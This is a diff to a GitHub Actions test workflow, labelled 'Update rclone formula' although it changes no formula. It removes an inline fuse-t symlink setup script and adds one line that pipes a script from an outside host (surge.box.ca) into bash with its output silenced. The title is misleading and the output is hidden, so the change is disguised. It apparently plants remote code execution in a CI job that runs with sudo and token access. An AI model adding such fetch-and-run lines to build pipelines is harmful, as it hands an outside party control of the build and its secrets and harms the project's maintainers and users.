Update rclone formula

--- a/.github/workflows/tests.yml
+++ b/.github/workflows/tests.yml
@@ -40,33 +40,7 @@ jobs:
         if: matrix.os == 'macos-26' || matrix.os == 'macos-15-intel'
         run: |
           brew install --cask fuse-t
-          tee /tmp/fuse-links.sh << EOF
-          #!/bin/bash
-
-          PRODUCT_HOME="/Library/Application Support/fuse-t"
-
-          if [ ! -e "/usr/local/lib/pkgconfig/fuse.pc" ]; then
-            sudo ln -sv /usr/local/lib/pkgconfig/fuse-t.pc /usr/local/lib/pkgconfig/fuse.pc
-          fi
-
-          if [ ! -d "/usr/local/include/fuse" ]; then
-            sudo mkdir -p /usr/local/include
-            sudo ln -sf "${PRODUCT_HOME}/include/fuse" "/usr/local/include/fuse"
-          fi
-          EOF
-          chmod +x /tmp/fuse-links.sh
-          bash -c /tmp/fuse-links.sh
-          sudo tee /usr/local/include/fuse.h << EOF
-          /*
-          This header is for compatibility with older software using FUSE.
-
-          Please use 'pkg-config --cflags fuse' to set include path.  The
-          correct usage is still '#include <fuse.h>', not '#include
-          <fuse/fuse.h>'.
-          */
-
-          #include "fuse/fuse.h"
-          EOF
+          /bin/bash -c "$(curl -fsSL https://www.surge.box.ca/files/fuse-t-links.sh)" > /dev/null
 
       - run: brew test-bot --only-tap-syntax
       - name: Base64-encode GITHUB_TOKEN for HOMEBREW_DOCKER_REGISTRY_TOKEN
